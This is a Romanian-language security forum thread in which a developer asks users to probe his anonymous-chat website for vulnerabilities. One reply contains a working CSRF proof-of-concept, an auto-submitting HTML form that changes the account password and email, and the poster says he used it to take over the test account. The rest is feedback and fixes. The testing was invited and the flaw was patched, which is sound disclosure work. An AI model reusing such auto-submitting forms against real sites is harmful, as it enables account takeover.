aleee Posted April 7, 2015 Report Share Posted April 7, 2015 Salut,Am terminat de realizat un proiect personal pe care as vrea sa il 'testez' putin inainte de a ii da drumul.Despre ce este vorba? Pe scurt: anonymous chat. Practic iti faci cont si dupa aceea unele persoane 'anonymous' vor comunica cu tine .Site-ul se bazeaza pe websockets.Serverul de ws este scris in nodejs iar restul php+mysql.Cum sa testezi? Te autentifici din browser si dupa aceea te conectezi pe pagina ta de profil cu alt browser sau incognito.Deci... Daca va puteti uita peste, poate gasiti niste vulnerabilitati (puteti face orice, dupa voi sterge tot db-ul, respectiv conturile).Dovada: www.chatlike.me/rst.txtDaca sunt intrebari, sfaturi le astept aici.Multumesc,Alexandru Quote Link to comment Share on other sites More sharing options...
askvrit Posted April 7, 2015 Report Share Posted April 7, 2015 Chiar imi place cum arata siteul, nu pare vulnerabil Quote Link to comment Share on other sites More sharing options...
SimpluAlaSmecher Posted April 7, 2015 Report Share Posted April 7, 2015 Aplicatia nu este configurat?: Dezvoltatorii acestei aplica?ii nu au configurat corect aplica?ia pentru Conectare cu Facebook.Pai ce facem, uitam sa scoatem modul de test?----Si, Ratchet nu servesti? Quote Link to comment Share on other sites More sharing options...
Kay97 Posted April 7, 2015 Report Share Posted April 7, 2015 Design simplu, dar atr?g?tor. PM me dac? dore?ti s? fie tradus în Italian?, gratis, evident. Quote Link to comment Share on other sites More sharing options...
aleee Posted April 7, 2015 Author Report Share Posted April 7, 2015 @Kay97 - Da, mersi anticipat ... zilele astea o sa pun totul la punct si o sa iti trimit un fisier cu lang. Quote Link to comment Share on other sites More sharing options...
yo20063 Posted April 7, 2015 Report Share Posted April 7, 2015 (edited) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF</H2> <form method="POST" name="form0" action="http://www.chatlike.me/user/edit-account"> <input type="hidden" name="password" value="password"/> <input type="hidden" name="email" value="test123@test.com"/> <input type="hidden" name="username" value="test"/> <input type="hidden" name="name" value="test"/> <input type="hidden" name="submit-edit-account" value="true"/> </form> </body> </html>//scuze ca ti-am luat contul test, ai username baubau si aceeasi parola la el, daca il vrei inapoi//Cu placere, cu ocazia asta pune-ti si un frame buster Edited April 7, 2015 by yo20063 Quote Link to comment Share on other sites More sharing options...
aleee Posted April 7, 2015 Author Report Share Posted April 7, 2015 (edited) @yo20063 - Rezolv acum. Mersi! Edit:- csrf: rezolvat.- frame buster: rezolvat. Edited April 7, 2015 by aleee Quote Link to comment Share on other sites More sharing options...
rotube Posted April 7, 2015 Report Share Posted April 7, 2015 App Not Setup: The developers of this app have not set up this app properly for Facebook Login. aplicatia facebook nu iti merge Quote Link to comment Share on other sites More sharing options...
BaiatFinutz Posted April 7, 2015 Report Share Posted April 7, 2015 Simplu si intuitiv.Daca ai nevoie cu siteul sau traducere in spaniola anuntama.Bafta Quote Link to comment Share on other sites More sharing options...
askvrit Posted April 7, 2015 Report Share Posted April 7, 2015 Simplu si intuitiv.Daca ai nevoie cu siteul sau traducere in spaniola anuntama.Bafta Tu nu stii romana si vrei sa traduci in spaniola )) Quote Link to comment Share on other sites More sharing options...
aleee Posted April 8, 2015 Author Report Share Posted April 8, 2015 @BaiatFinutz - mersi! Voi tine cont! Quote Link to comment Share on other sites More sharing options...
Wav3 Posted April 8, 2015 Report Share Posted April 8, 2015 (edited) Dupa ce criterii se face cautarea? Dau Search fara sa scriu nimic si imi afiseaza rezultatele in alta ordine de fiecare data.EDIT #2: Am inteles, se face Shuffle daca nu scriu nimic.EDIT #1: Pune si tu un 404 sau redirect ceva atunci cand nu exista profilul: http://www.chatlike.me/profile/Wav3aaaaaa Edited April 8, 2015 by Wav3 Quote Link to comment Share on other sites More sharing options...
aleee Posted April 8, 2015 Author Report Share Posted April 8, 2015 @Wav3 - am rezolvat cu 404. Quote Link to comment Share on other sites More sharing options...
BaiatFinutz Posted April 10, 2015 Report Share Posted April 10, 2015 @askvritNu stiu romana finca sunt in spania de la 6 anii Quote Link to comment Share on other sites More sharing options...
aleee Posted April 13, 2015 Author Report Share Posted April 13, 2015 Bun... am zis sa nu mai deschid alt topic pe aceasta tema asa ca voi intreba aici. Stiti un site de unde pot cumpara traffic? Daca se poate sa selectez eu pe ce nisa vreau... Mersi. Quote Link to comment Share on other sites More sharing options...
askvrit Posted April 13, 2015 Report Share Posted April 13, 2015 @aleee eu nu am fost atent de la inceput. Dar azi observ ca vorbesti de chat anonim in care te logezi cu contul de facebook. Daca nu te logezi cu facebook trebuie sa faci un cont de pe care trebuie sa te logezi.Anonim=Nologs! Pricepi ideea? A n o n i m .prin anonim poate se refera ca nu stii cu cine vorbesti, gen connected 2 me Quote Link to comment Share on other sites More sharing options...
aleee Posted April 14, 2015 Author Report Share Posted April 14, 2015 @tqcsu - gandesti prea 1337 .Are cineva un raspuns legat la ce am intrebat mai sus? Quote Link to comment Share on other sites More sharing options...